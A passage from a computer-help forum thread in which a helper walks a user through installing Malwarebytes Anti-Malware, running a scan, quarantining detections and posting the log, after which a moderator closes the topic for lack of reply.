OK lets now run a final check for any hangers on :)

bf_new.gif Please download Malwarebytes' Anti-Malware from Here.

Double Click mbam-setup-2.0..exe to install the application. (The revision number may vary.)
  • Select the language and click OK.
  • Accept the agreement
  • Make sure a checkmark removed next to Enable the Free Trial and Launch Malwarebytes' Anti-Malware, then click on finish.
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select "Scan Now".
  • The scan may take some time to finish,so please be patient.
  • When the scan is complete, click on Quarantine All,.
  • When disinfection is completed, a dialog will open and you may be prompted to Restart.(See Extra Note)
  • Upon restart, launch Malwarebytes Antimalware and select History.
  • Double click on the last scan done, then on Copy to Clipboard.
  • To submit your reply, click on Add Reply, then right click on the window and select Paste.
  • Submit your reply.
Extra Note:

If MBAM encounters a file that is difficult to remove,you will be presented with 1 of 2 prompts,click OK to either and let MBAM proceed with the disinfection process. If asked to restart the computer, please do so immediatly.
  • 0

#9
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Due to lack of feedback, this topic has been closed.

If you need this topic reopened, please contact a staff member. This applies only to the original topic starter. Everyone else please begin a New Topic.
  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP